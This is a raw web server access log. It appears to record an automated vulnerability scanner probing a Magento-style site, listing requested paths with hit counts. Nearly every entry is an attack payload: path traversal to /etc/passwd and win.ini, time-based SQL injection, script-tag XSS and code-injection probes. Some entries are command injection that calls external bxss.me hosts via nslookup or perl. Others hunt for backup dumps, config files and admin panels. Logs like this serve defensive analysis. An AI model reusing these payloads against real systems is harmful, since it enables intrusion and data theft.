/acc/index.php/install/wizard//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini 1 -
/acc/js/mage/cookies.js/974359%40 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/prototype/extended_debug.js 1 -
/acc/index.php//../../../WEB-INF/web.xml%C0%80.jsp 1 -
/acc/skin/.%2finstall/default/default/css/iestyles.css 1 https://104.36.149.61/
/.%2facc/js/prototype/windows/ 1 https://104.36.149.61/
/acc/js/1%00%c0%a7%c0%a2%252527%252522/translate.js 1 https://104.36.149.61/
/acc/..%2fjs/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/grid.js 1 -
/|echo%20umnnmh$()\\%20ofddyv\\nz^xyu||a%20%23'%20|echo%20umnnmh$()\\%20ofddyv\\nz^xyu||a%20%23|\"%20|echo%20umnnmh$()\\%20ofddyv\\nz^xyu||a%20%23/js/scriptaculous/effects.js 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'sU2H'='sU2H/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
//.../.../.../.../.../.../.../.../windows/win.ini 1 -
/1'\"/index.php/install/wizard/config/ 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>pdCA(9384)<%2fScRiPt>/index.php/install/ 1 https://104.36.149.61/
/bxss.me/js/mage/translate.js 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/skin/adminhtml/ 1 https://104.36.149.61/
/g0lAV2cq'%3b%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/ 1 https://104.36.149.61/
/104-db.sql.gz 1 -
/<!--/js/prototype/validation.js 1 -
/acc/index.php/install/wizard//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd 1 -
/|echo%20rggsnt$()\\%20psjlyw\\nz^xyu||a%20%23'%20|echo%20rggsnt$()\\%20psjlyw\\nz^xyu||a%20%23|\"%20|echo%20rggsnt$()\\%20psjlyw\\nz^xyu||a%20%23/js/prototype/validation.js 1 -
/udUTQhYC'%20OR%2054=(SELECT%2054%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/owa/auth/logon.aspx 64 -
/&(nslookup%20hitoagmtateei1142a.bxss.me||perl%20-e%20\"gethostbyname('hitoagmtateei1142a.bxss.me')\")&'\\\"`0&(nslookup%20hitoagmtateei1142a.bxss.me||perl%20-e%20\"gethostbyname('hitoagmtateei1142a.bxss.me')\")&`'/js/mage/adminhtml/image.js 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/ 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(114).concat(70).concat(109).concat(69)+(require\"socket\"%0aSocket.gethostbyname(\"hityt\"+\"luucvwyx2557e.bxss.me.\")[3].to_s)+\"/skin/install/default/default/css/ie7minus.css 1 -
/$(nslookup%20hittsubabzede0ecd0.bxss.me||perl%20-e%20\"gethostbyname('hittsubabzede0ecd0.bxss.me')\")/js/prototype/windows/ 1 -
/myadmin/ 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/product/ 1 -
/actuator/health 23 -
/acc/%3b(nslookup%20hitmkjufiepum32f96.bxss.me||perl%20-e%20\"gethostbyname('hitmkjufiepum32f96.bxss.me')\")|(nslookup%20hitmkjufiepum32f96.bxss.me||perl%20-e%20\"gethostbyname('hitmkjufiepum32f96.bxss.me')\")&(nslookup%20hitmkjufiepum32f96.bxss.me||perl%2 1 -
/acc/index.php/install/wizard/locale//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 1 -
/-1%20OR%203+765-765-1=0+0+0+1/skin/install/default/default/ 1 https://104.36.149.61/
/nmaplowercheck1652581557 1 -
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/product/ 1 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/product/ 1 https://104.36.149.61/
/stream/live.php 4 -
/&echo%20ceasah$()\\%20actuiz\\nz^xyu||a%20%23'%20&echo%20ceasah$()\\%20actuiz\\nz^xyu||a%20%23|\"%20&echo%20ceasah$()\\%20actuiz\\nz^xyu||a%20%23/js/mage/adminhtml/sales/ 1 -
//%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\/etc/passwd 1 -
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/hash.js 1 https://104.36.149.61/
/&echo%20xacxgf$()\\%20igbfvp\\nz^xyu||a%20%23'%20&echo%20xacxgf$()\\%20igbfvp\\nz^xyu||a%20%23|\"%20&echo%20xacxgf$()\\%20igbfvp\\nz^xyu||a%20%23/js/mage/translate.js 1 -
/\"%3bprint(md5(31337))%3b$a=\"/skin/install/default/default/css/ie7minus.css 1 -
/acc'||'/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/cgi-bin/\"977631%40 1 https://104.36.149.61/
/104.36.149.61-dump.rar 1 -
/acc/js/mage/%3b(nslookup%20hitukwjjtkzvdbd995.bxss.me||perl%20-e%20\"gethostbyname('hitukwjjtkzvdbd995.bxss.me')\")|(nslookup%20hitukwjjtkzvdbd995.bxss.me||perl%20-e%20\"gethostbyname('hitukwjjtkzvdbd995.bxss.me')\")&(nslookup%20hitukwjjtkzvdbd995.bxss.me 1 -
///%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd 1 -
/myadmin/main.php 1 -
/104-database.7z 1 -
/104-database.zip 1 -
/acc'||'/js/prototype/ 1 https://104.36.149.61/
/LPMzJ5pz'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/cgi-bin/.travis.yml 1 -
/-1%20OR%202+548-548-1=0+0+0+1/js/varien/form.js 1 https://104.36.149.61/
/app/config/database.yml 1 -
/acc/..%2fjs/prototype/windows/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/product/ 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/phpmyadmin2/main.php 1 -
//.. 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/accordion.js 1 -
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>JGJG(9148)<%2fScRiPt>/flexuploader.js 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(99).concat(80).concat(119).concat(67)+(require'socket'%0aSocket.gethostbyname('hitrt'+'huacvztu36a27.bxss.me.')[3].to_s)+'/index.php/install/wizard/locale/ 1 -
/cgi-bin/.bower.json 1 -
/-1%20OR%203+142-142-1=0+0+0+1/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/8P5S7i9U'%20OR%20745=(SELECT%20745%20FROM%20PG_SLEEP(15))--/index.php/install/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/config/..%2f..%2f..%2f..%2fGemfile 1 -
/acc/index.php/install/wizard/locale//%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%2/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%a 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/104_dump.tar 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/..%2facc/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/104.sql.gz 1 -
/acc/%3b(nslookup%20hitqzmuejdqada1b1b.bxss.me||perl%20-e%20\"gethostbyname('hitqzmuejdqada1b1b.bxss.me')\")|(nslookup%20hitqzmuejdqada1b1b.bxss.me||perl%20-e%20\"gethostbyname('hitqzmuejdqada1b1b.bxss.me')\")&(nslookup%20hitqzmuejdqada1b1b.bxss.me||perl%2 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/uploader/ 1 -
/acc/skin/adminhtml/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/ 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/js/scriptaculous/.%2feffects.js 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/index.php/install/wizard//%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%2/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae 1 -
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/giftmessage.js 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/varien/form.js 1 -
/acc/js/mage/.%2fadminhtml/form.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/mage/adminhtml/wysiwyg/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/prototype/windows/ 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/.%2facc/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/browser.js 1 https://104.36.149.61/
/cgi-bin/admin.cgi 1 ()%20{%20Referer
/|echo%20wztjez$()\\%20rcsfsp\\nz^xyu||a%20%23'%20|echo%20wztjez$()\\%20rcsfsp\\nz^xyu||a%20%23|\"%20|echo%20wztjez$()\\%20rcsfsp\\nz^xyu||a%20%23/js/varien/js.js 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(103).concat(73).concat(114).concat(85)+(require\"socket\"%0aSocket.gethostbyname(\"hittc\"+\"sgoseltk91504.bxss.me.\")[3].to_s)+\"/js/prototype/windows/themes/ 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/ 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/ 1 -
/-1%20OR%203+812-812-1=0+0+0+1/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/'+response.write(9682307*9029219)+'/js/varien/js.js 1 -
/|echo%20oukxyq$()\\%20wmzqju\\nz^xyu||a%20%23'%20|echo%20oukxyq$()\\%20wmzqju\\nz^xyu||a%20%23|\"%20|echo%20oukxyq$()\\%20wmzqju\\nz^xyu||a%20%23/js/prototype/debug.js 1 -
/|(nslookup%20hituyfsuesnup33af8.bxss.me||perl%20-e%20\"gethostbyname('hituyfsuesnup33af8.bxss.me')\")/index.php/install/wizard/locale/ 1 -
/-1%20OR%202+476-476-1=0+0+0+1/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/)/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/uploader/ 1 -
/'+'A'.concat(70-3).concat(22*4).concat(121).concat(78).concat(117).concat(84)+(require'socket'%0aSocket.gethostbyname('hitwu'+'qwqklfjx8d4b4.bxss.me.')[3].to_s)+'/js/mage/adminhtml/hash.js 1 -
/acc/index.php/install/wizard/config/../../../../../web.config 1 -
/response.write(9912697*9392180)/js/mage/adminhtml/product/ 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/browser.js 1 -
/..%2f..%2f..%2fGemfile 1 -
/MpXGDHCB/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/%2fxfs.bxss.me/index.php/install/wizard/locale/ 1 -
/acc/index.php//../../WEB-INF/web.xml%00.jsp 1 -
/<!--/js/prototype/debug.js 1 -
/(nslookup%20hitmkrmjyhrdnd0142.bxss.me||perl%20-e%20\"gethostbyname('hitmkrmjyhrdnd0142.bxss.me')\")/js/mage/adminhtml/events.js 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/index.php/..%2fGemfile 1 -
/'+'A'.concat(70-3).concat(22*4).concat(122).concat(76).concat(115).concat(75)+(require'socket'%0aSocket.gethostbyname('hitep'+'vjwhrexv269ac.bxss.me.')[3].to_s)+'/js/prototype/windows/ 1 -
/acc/..%2findex.php/install/wizard/locale/ 1 https://104.36.149.61/
/'+response.write(9144333*9885293)+'/js/mage/adminhtml/wysiwyg/ 1 -
//database.inc.php 1 -
/acc/skin/install/default/%2fxfs.bxss.me/css/clears.css 1 -
/acc'||'/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/39fKu2S0/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/(nslookup%20hitdewlyaxaxfe66ea.bxss.me||perl%20-e%20\"gethostbyname('hitdewlyaxaxfe66ea.bxss.me')\")/js/mage/adminhtml/hash.js 1 -
/CFIDE/scripts/ajax/FCKeditor 2 -
/acc/skin/install/..%2fdefault/default/css/iestyles.css 1 https://104.36.149.61/
/acc/skin/install/default/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/css/ie7minus.css 1 -
/`(nslookup%20hitvwtxgkciht63157.bxss.me||perl%20-e%20\"gethostbyname('hitvwtxgkciht63157.bxss.me')\")`/js/mage/adminhtml/accordion.js 1 -
/cgi-bin/%c0%ae/WEB-INF/web.xml 1 -
/acc/skin/install/default/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/css/boxes.css 1 -
/'.gethostbyname(lc('hitjv'.'bzqyddmtbef93.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(73).chr(105).chr(68).'/js/prototype/extended_debug.js 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/adminhtml/default/ 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/cgi-bin/package-lock.json 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/backup.js 1 -
/acc/skin/install/default/bxss.me%2ft%2fxss.html%3f%2500/ 1 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>IUUR(9435)<%2fScRiPt>/adminhtml/giftmessage.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>6DR8(9951)<%2fScRiPt>/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/<!--/js/mage/adminhtml/flexuploader.js 1 -
//js/mage/adminhtml/form.js 1 https://104.36.149.61/
/cgi-bin/appsettings.Development.json 1 -
/acc/js/scriptaculous/bxss.me%2ft%2fxss.html%3f%2500.js 1 -
/acc/js/varien/form.js/931178%40 1 https://104.36.149.61/
/104-db.7z 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/validation.js 1 https://104.36.149.61/
/-1%20OR%202+68-68-1=0+0+0+1/js/prototype/prototype.js 1 https://104.36.149.61/
/../release.js 1 -
/1nGrdifiO/skin/adminhtml/default/ 1 -
/104_database.rar 1 -
/1'\"/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/js/.%2fprototype/extended_debug.js 1 https://104.36.149.61/
/104_backup.7z 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/skin/%3b(nslookup%20hitjzmyyxaluqb6159.bxss.me||perl%20-e%20\"gethostbyname('hitjzmyyxaluqb6159.bxss.me')\")|(nslookup%20hitjzmyyxaluqb6159.bxss.me||perl%20-e%20\"gethostbyname('hitjzmyyxaluqb6159.bxss.me')\")&(nslookup%20hitjzmyyxaluqb6159.bxss.me||p 1 -
/\".gethostbyname(lc(\"hitaa\".\"kwzqgvqa6e7e9.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(112).chr(70).chr(99).chr(75).\"/js/mage/adminhtml/hash.js 1 -
/+CSCOU+/../+CSCOE+/files/file_list.json 1 -
/acc/js/varien/..%2fform.js 1 https://104.36.149.61/
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/browser.js 1 -
/\"%3bprint(md5(31337))%3b$a=\"/skin/install/default/default/css/iestyles.css 1 -
/@@szAX0/js/prototype/prototype.js 1 https://104.36.149.61/
/content/phpthumb/phpthumb.php 1 -
/acc9815092/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost//../../../../../../../../etc/passwd%00 1 -
/(nslookup%20hitkmsueuoxox35660.bxss.me||perl%20-e%20\"gethostbyname('hitkmsueuoxox35660.bxss.me')\")/js/mage/adminhtml/backup.js 1 -
/|(nslookup%20hittqvfsaqgwo789d3.bxss.me||perl%20-e%20\"gethostbyname('hittqvfsaqgwo789d3.bxss.me')\")/js/varien/js.js 1 -
/server-status 1 -
/server.js 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/translate.js 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'0uS5'!='0uS5%25/js/prototype/validation.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/prototype/validation.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml/uploader.js/939379%40 1 https://104.36.149.61/
/cgi-bin/app.js 1 -
/.DS_Store 1 -
/acc/%2fxfs.bxss.me/mage/adminhtml/wysiwyg/ 1 -
/'+'A'.concat(70-3).concat(22*4).concat(121).concat(90).concat(104).concat(76)+(require'socket'%0aSocket.gethostbyname('hitzd'+'bagrupmcd9171.bxss.me.')[3].to_s)+'/skin/install/default/default/css/ie7minus.css 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/prototype/validation.js 1 -
/cgi-bin/Rakefile 1 -
/axis/services/listServices 1 -
/^(%23$!@%23$)(()))******/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/.%2fskin/adminhtml/default/ 1 https://104.36.149.61/
/'.gethostbyname(lc('hitng'.'corvwbof20ede.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(71).chr(108).chr(66).'/skin/install/default/default/css/boxes.css 1 -
/acc/js/%2fxfs.bxss.me/adminhtml/flexuploader.js 1 -
/acc/js/..%2fmage/translate.js 1 https://104.36.149.61/
//../../../WEB-INF/web.xml%00.jsp 1 -
/showLogin.cc 3 -
/acc/%3b(nslookup%20hitxndeqeakald0a9b.bxss.me||perl%20-e%20\"gethostbyname('hitxndeqeakald0a9b.bxss.me')\")|(nslookup%20hitxndeqeakald0a9b.bxss.me||perl%20-e%20\"gethostbyname('hitxndeqeakald0a9b.bxss.me')\")&(nslookup%20hitxndeqeakald0a9b.bxss.me||perl%2 1 -
/acc/%2fxfs.bxss.me/mage/adminhtml/events.js 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/uploader/ 1 -
/acc/skin/install/default/default/%2fxfs.bxss.me/boxes.css 1 -
/acc/index.php/install//%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%2/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c5 1 -
/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvc2hlbGxzIiwgIm91dCJdXQ%3d%3d/test.jpeg 1 -
/docs/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/shells 1 -
/^(%23$!@%23$)(()))******/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/YeYVasjR'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>q8Xa(9547)<%2fScRiPt>/mage/adminhtml/browser.js 1 https://104.36.149.61/
/-1%20OR%202+582-582-1=0+0+0+1/js/varien/js.js 1 https://104.36.149.61/
/phpmoadmin/moadmin.php 1 -
/acc/skin/install/default/'\"()&%25<acx><ScRiPt%20>Ijhk(9816)<%2fScRiPt>/css/boxes.css 1 https://104.36.149.61/
/phpmyadmin2/ 1 -
/'.gethostbyname(lc('hitmr'.'hsdmdjza42f84.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(78).chr(103).chr(75).'/index.php/install/wizard/locale/ 1 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"qTL9\"=\"qTL9/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/scriptaculous/effects.js 1 -
/acc'||'/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ 1 -
/echo%20pgdxtr$()\\%20zxpzii\\nz^xyu||a%20%23'%20&echo%20pgdxtr$()\\%20zxpzii\\nz^xyu||a%20%23|\"%20&echo%20pgdxtr$()\\%20zxpzii\\nz^xyu||a%20%23/index.php/install/wizard/locale/ 1 -
/-1%20OR%202+36-36-1=0+0+0+1/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(115).concat(70).concat(109).concat(83)+(require\"socket\"%0aSocket.gethostbyname(\"hitxm\"+\"vkwiosywe22aa.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/wysiwyg/ 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml/giftoptions/./WEB-INF/web.xml%00.jsp 2 -
/cgi-bin/core 1 -
/include/js/extjs//examples/feed-viewer/feed-proxy.php 1 -
/${@print(md5(31337))}\\/js/prototype/ 1 -
//js/varien/js.js 1 https://104.36.149.61/
/pma/main.php 1 -
/authenticationendpoint/webrepo.jsp 1 -
/acc/skin/install/default/default/css'\"()&%25<acx><ScRiPt%20>dgnk(9019)<%2fScRiPt>/iestyles.css 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//../../../../../../../../etc/passwd 2 -
/acc/index.php/install/wizard/config/..%2f..%2f..%2fGemfile 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>sjVf(9546)<%2fScRiPt>/windows/themes/ 1 https://104.36.149.61/
/database.yml.sqlite3 1 -
/acc/skin/install/default/default/.%2fcss/ie7minus.css 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>gf47(9462)<%2fScRiPt>/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/form.js 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/varien/js.js 1 -
/acc/index.php/install//../../../../../../../../windows/win.ini%00.jpg 1 -
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>Rirk(9346)<%2fScRiPt>/js/varien/js.js 1 https://104.36.149.61/
/dbdump.sql.tar 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/image.js 1 -
/${@print(md5(31337))}/js/mage/adminhtml/giftmessage.js 1 -
/1'\"/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/skin/install/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/default/css/boxes.css 1 https://104.36.149.61/
/'\"/js/mage/adminhtml/accordion.js 1 -
/<!--/skin/adminhtml/default/ 1 -
/acc/index.php/install/..%2f..%2f..%2f..%2fGemfile 1 -
/acc/index.php/install/wizard/locale/..%2f..%2f..%2f..%2f..%2fGemfile 1 -
/acc'\"()&%25<acx><ScRiPt%20>gumy(9051)<%2fScRiPt>/skin/adminhtml/default/ 1 https://104.36.149.61/
/c/version.js 4 -
/104.36.149.61.zip 1 -
/yarn.lock 1 -
/wp-content/plugins/jetpack/_inc/genericons/genericons/example.html 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/prototype/tooltip.js 1 -
/acc/skin/install/./WEB-INF/web.xml%00.jsp 2 -
//%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc/passwd 1 -
/@@AddSv/js/mage/translate.js 1 https://104.36.149.61/
/acc/..%2fjs/varien/form.js 1 https://104.36.149.61/
/JsZQwMPH'%20OR%20258=(SELECT%20258%20FROM%20PG_SLEEP(15))--/js/prototype/windows/ 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/grid.js 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/debug.js 1 https://104.36.149.61/
/Gruntfile.coffee 1 -
/logon/LogonPoint/custom.html 2 -
/acc/js/mage/..%2fadminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/sales/ 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/giftoptions/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/mage/adminhtml/sales/ 1 -
/&(nslookup%20hitxsxhrmtnpg6e353.bxss.me||perl%20-e%20\"gethostbyname('hitxsxhrmtnpg6e353.bxss.me')\")&'\\\"`0&(nslookup%20hitxsxhrmtnpg6e353.bxss.me||perl%20-e%20\"gethostbyname('hitxsxhrmtnpg6e353.bxss.me')\")&`'/js/prototype/windows/ 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(98).concat(86).concat(112).concat(76)+(require\"socket\"%0aSocket.gethostbyname(\"hitfl\"+\"ssqoovog05043.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/sales/ 1 -
/acc/js/mage/..%2fadminhtml/browser.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//../../../../../../../../etc/passwd%00.jsp 1 -
